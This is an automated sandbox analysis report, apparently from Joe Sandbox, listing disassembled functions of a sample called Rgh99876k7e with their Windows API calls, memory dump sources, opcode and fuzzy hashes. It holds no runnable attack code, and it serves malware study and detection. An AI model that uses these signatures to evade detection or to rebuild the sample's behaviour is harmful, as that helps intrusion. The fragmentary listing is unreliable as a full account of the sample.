                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: fb4257d74755fe0b486cf08a0090c690ab8b9fa7343b5e664331cdfdc5436bdd
                          • Instruction ID: 6a6fab3277803ee8febed0b741f77a8699fb2f951c94c90773093c111336971f
                          • Opcode Fuzzy Hash: fb4257d74755fe0b486cf08a0090c690ab8b9fa7343b5e664331cdfdc5436bdd
                          • Instruction Fuzzy Hash: CD51D6B16047D53DFB3783348C96B7A7EE86B46300F088589E5D6668C2D39DEC84DB62
                          Function 0073542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleCP.KERNEL32(00743CD6,?,?,?,?,?,?,?,?,00735BA3,?,?,00743CD6,?,?), ref: 00735470
                          • __fassign.LIBCMT ref: 007354EB
                          • __fassign.LIBCMT ref: 00735506
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00743CD6,00000005,00000000,00000000), ref: 0073552C
                          • WriteFile.KERNEL32(?,00743CD6,00000000,00735BA3,00000000,?,?,?,?,?,?,?,?,?,00735BA3,?), ref: 0073554B
                          • WriteFile.KERNEL32(?,?,00000001,00735BA3,00000000,?,?,?,?,?,?,?,?,?,00735BA3,?), ref: 00735584
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: afac1b2e4488387c438565d641b8b2be129364a09d1d5a2199b2825f9d4e9621
                          • Instruction ID: 87f9fa225ae789eb4890d3a1874c91534ba8984b1d42f21f0913e5e24a915642
                          • Opcode Fuzzy Hash: afac1b2e4488387c438565d641b8b2be129364a09d1d5a2199b2825f9d4e9621
                          • Instruction Fuzzy Hash: 4951D6709006499FEF11CFA8D845AEEBBFAEF08300F14451AF555E7292E734AA51CB64
                          Function 007810B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0078304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0078307A
                            • Part of subcall function 0078304E: _wcslen.LIBCMT ref: 0078309B
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00781112
                          • WSAGetLastError.WSOCK32 ref: 00781121
                          • WSAGetLastError.WSOCK32 ref: 007811C9
                          • closesocket.WSOCK32(00000000), ref: 007811F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 2675159561-0
                          • Opcode ID: 613885c8a55c78b3e7bc4c1ba64b11dd8d3abdf6e13c1ead75a50e92e894f141
                          • Instruction ID: a5c8a2407afab7c99b07a49fe6686a3c209f730ee094fd908448eafd70813fe6
                          • Opcode Fuzzy Hash: 613885c8a55c78b3e7bc4c1ba64b11dd8d3abdf6e13c1ead75a50e92e894f141
                          • Instruction Fuzzy Hash: C541E531A00208EFDB11AF54CC88BA9B7E9EF45364F548159FD159B291C778ED42CBE1
                          Function 0076CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0076CF22,?), ref: 0076DDFD
                            • Part of subcall function 0076DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0076CF22,?), ref: 0076DE16
                          • lstrcmpiW.KERNEL32(?,?), ref: 0076CF45
                          • MoveFileW.KERNEL32(?,?), ref: 0076CF7F
                          • _wcslen.LIBCMT ref: 0076D005
                          • _wcslen.LIBCMT ref: 0076D01B
                          • SHFileOperationW.SHELL32(?), ref: 0076D061
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                          • String ID: \*.*
                          • API String ID: 3164238972-1173974218
                          • Opcode ID: a31319cc12bf3a3c1b9cbad2caedf022ab882e4d027cfc00099763845dc336bb
                          • Instruction ID: ee4e20eb40895ec412b8c3cf5ec803f99d8f593502c14c3306f20c78547e1f2b
                          • Opcode Fuzzy Hash: a31319cc12bf3a3c1b9cbad2caedf022ab882e4d027cfc00099763845dc336bb
                          • Instruction Fuzzy Hash: C1415772D45118DFDF17EBA4D985AEEB7B9AF08380F0400E6E546E7141EB38AA85CB50
                          Function 00792DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00792E1C
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00792E4F
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00792E84
                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00792EB6
                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00792EE0
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00792EF1
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00792F0B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: d62fb6fe19a55d69c8a31a47a5a84cdcd25bf12174366ecfddbbb910f09393cd
                          • Instruction ID: 9b81114319757fa9c3182780e653615d8fc38ca14d53f91808aa87099f4393c5
                          • Opcode Fuzzy Hash: d62fb6fe19a55d69c8a31a47a5a84cdcd25bf12174366ecfddbbb910f09393cd
                          • Instruction Fuzzy Hash: 18311235605240AFEF21EF18ECD8F6537E1EB8A710F5541A6F9008B2B2CB79A842DB54
                          Function 00767726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767769
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0076778F
                          • SysAllocString.OLEAUT32(00000000), ref: 00767792
                          • SysAllocString.OLEAUT32(?), ref: 007677B0
                          • SysFreeString.OLEAUT32(?), ref: 007677B9
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007677DE
                          • SysAllocString.OLEAUT32(?), ref: 007677EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: f42397510e815b9927739169ad917b586554c6813475f1f09a33d0510e7b8d1d
                          • Instruction ID: 82e9e613b198c458651b086f0c10739708f55113cc1c9279bb6a8b08fc0a81e1
                          • Opcode Fuzzy Hash: f42397510e815b9927739169ad917b586554c6813475f1f09a33d0510e7b8d1d
                          • Instruction Fuzzy Hash: 1E21A476604219AFDF14DFA8CD88CBB77ACEB097A87048026FD15DB1A0D678DC46C764
                          Function 007677FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767842
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00767868
                          • SysAllocString.OLEAUT32(00000000), ref: 0076786B
                          • SysAllocString.OLEAUT32 ref: 0076788C
                          • SysFreeString.OLEAUT32 ref: 00767895
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007678AF
                          • SysAllocString.OLEAUT32(?), ref: 007678BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: f047e9579936bb62de137893d3725b76fcb83e8f42ecc1cd689795639cf6e3fe
                          • Instruction ID: 3c4e39ace994e4506a9051f4e89494a09035c0acaeb937cb69d78239e7a14568
                          • Opcode Fuzzy Hash: f047e9579936bb62de137893d3725b76fcb83e8f42ecc1cd689795639cf6e3fe
                          • Instruction Fuzzy Hash: 16218371608205AFDF159FB8DC8CDBA77ECEB097A47108125F916CB2A1D678DC81CB68
                          Function 007704D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 007704F2
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0077052E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: 393eefed977f07443e1da7fd0f0839726d6be4a1ac14c9049cb77de0d6e13f04
                          • Instruction ID: 08b1348864056007d19c232c1d54f191e9ffc4479ebf9d4d99c8d90572391ade
                          • Opcode Fuzzy Hash: 393eefed977f07443e1da7fd0f0839726d6be4a1ac14c9049cb77de0d6e13f04
                          • Instruction Fuzzy Hash: 1D218071500305EBDF208F29DC48EAA7BA4BF447A4F208A19F8A5D62E0D7749961CFA0
                          Function 007705A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 007705C6
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00770601
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: cf9a7c2043555fa2313a3f5afc306594ce3ae1e146afdf7260f1724c46454160
                          • Instruction ID: ac21eb5a40579afe1ddfcee62530e6b7bf31fe43ab2b60646ece80bd767b2e7b
                          • Opcode Fuzzy Hash: cf9a7c2043555fa2313a3f5afc306594ce3ae1e146afdf7260f1724c46454160
                          • Instruction Fuzzy Hash: D821E275500305DBDF208F68CC58A9A77F4BF817A4F208B1AF8A5E32E0D7749861CBA4
                          Function 007940AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0070600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
                            • Part of subcall function 0070600E: GetStockObject.GDI32(00000011), ref: 00706060
                            • Part of subcall function 0070600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00794112
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0079411F
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0079412A
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00794139
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00794145
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 31c1d960b0f7fe293cb14e9f6f54f6910cebc974319be4a96ccd02b248e8f6f1
                          • Instruction ID: 071d2feac6439bcdefa54fb2b79bb614369b080eded4cb0fd1a915324d38f903
                          • Opcode Fuzzy Hash: 31c1d960b0f7fe293cb14e9f6f54f6910cebc974319be4a96ccd02b248e8f6f1
                          • Instruction Fuzzy Hash: 8611B6B214011DBEEF119F64CC85EE77F9DEF08798F004111B618A2050C6769C21DBA4
                          Function 0073D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0073D7A3: _free.LIBCMT ref: 0073D7CC
                          • _free.LIBCMT ref: 0073D82D
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 0073D838
                          • _free.LIBCMT ref: 0073D843
                          • _free.LIBCMT ref: 0073D897
                          • _free.LIBCMT ref: 0073D8A2
                          • _free.LIBCMT ref: 0073D8AD
                          • _free.LIBCMT ref: 0073D8B8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction ID: fc3db54e2e92da4916d785b2e6e36beaa2d6b9f440e9d37746bb7a850f88d83e
                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction Fuzzy Hash: 95111F71940B14EAF531BFB0EC4BFCB7BDC6F04700F404825B699A65A3DB69B9064A50
                          Function 0076DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0076DA74
                          • LoadStringW.USER32(00000000), ref: 0076DA7B
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0076DA91
                          • LoadStringW.USER32(00000000), ref: 0076DA98
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0076DADC
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 0076DAB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 4072794657-3128320259
                          • Opcode ID: 69addeb2120887efefea288a6b628b731506ca1e4bbf5d25079a6f7a538bba93
                          • Instruction ID: 4ee65b4c91f294eaa2fecd41a5e0bdc6a2314772055f65702d922af6b517344e
                          • Opcode Fuzzy Hash: 69addeb2120887efefea288a6b628b731506ca1e4bbf5d25079a6f7a538bba93
                          • Instruction Fuzzy Hash: 490112F69442087FEB11DBE49D89EE7776CE708701F408496B746E2041E6789E854F78
                          Function 0077096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(0190FEF8,0190FEF8), ref: 0077097B
                          • EnterCriticalSection.KERNEL32(0190FED8,00000000), ref: 0077098D
                          • TerminateThread.KERNEL32(00000004,000001F6), ref: 0077099B
                          • WaitForSingleObject.KERNEL32(00000004,000003E8), ref: 007709A9
                          • CloseHandle.KERNEL32(00000004), ref: 007709B8
                          • InterlockedExchange.KERNEL32(0190FEF8,000001F6), ref: 007709C8
                          • LeaveCriticalSection.KERNEL32(0190FED8), ref: 007709CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 70873c22a785b7e3d114070329d23f6d0f946579c7b0f2ae0b42efc19a0c7d56
                          • Instruction ID: b46d8ffbe5f5d5b51bdd15562164278458cc08353932c754805ac2f44cd519fa
                          • Opcode Fuzzy Hash: 70873c22a785b7e3d114070329d23f6d0f946579c7b0f2ae0b42efc19a0c7d56
                          • Instruction Fuzzy Hash: 1FF0CD31442A12EBDF525BA4EE8DAD67A25BF05742F805016F201508A1C779A476CFA4
                          Function 00781C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                          Download Yara Rule
                          APIs
                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00781DC0
                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00781DE1
                          • WSAGetLastError.WSOCK32 ref: 00781DF2
                          • htons.WSOCK32(?,?,?,?,?), ref: 00781EDB
                          • inet_ntoa.WSOCK32(?), ref: 00781E8C
                            • Part of subcall function 007639E8: _strlen.LIBCMT ref: 007639F2
                            • Part of subcall function 00783224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0077EC0C), ref: 00783240
                          • _strlen.LIBCMT ref: 00781F35
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                          • String ID:
                          • API String ID: 3203458085-0
                          • Opcode ID: 5596c3b0154044bc120f197c1ee0e730f0a5a21a04fb971c17fe5527d6e62cda
                          • Instruction ID: c32e91c6deacc1e590a88580221e0676b1ad95dcdc31d2fd36eea58410482a16
                          • Opcode Fuzzy Hash: 5596c3b0154044bc120f197c1ee0e730f0a5a21a04fb971c17fe5527d6e62cda
                          • Instruction Fuzzy Hash: A1B1F431244340EFC724EF24C899E2A77E9AF84318F94864CF5565B2E2DB79ED42CB91
                          Function 007301B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                          Download Yara Rule
                          APIs
                          • __allrem.LIBCMT ref: 007300BA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007300D6
                          • __allrem.LIBCMT ref: 007300ED
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0073010B
                          • __allrem.LIBCMT ref: 00730122
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00730140
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                          • Instruction ID: bc37ed5ac64abc873799aa5e7834fe34111d83f61bb2db554f5433dce257f6c4
                          • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                          • Instruction Fuzzy Hash: 9F810676A0071AEBF724AE28DC55B6F73F8AF41724F24413AF551D6682E778D9008790
                          Function 007361FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007282D9,007282D9,?,?,?,0073644F,00000001,00000001,8BE85006), ref: 00736258
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0073644F,00000001,00000001,8BE85006,?,?,?), ref: 007362DE
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007363D8
                          • __freea.LIBCMT ref: 007363E5
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          • __freea.LIBCMT ref: 007363EE
                          • __freea.LIBCMT ref: 00736413
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
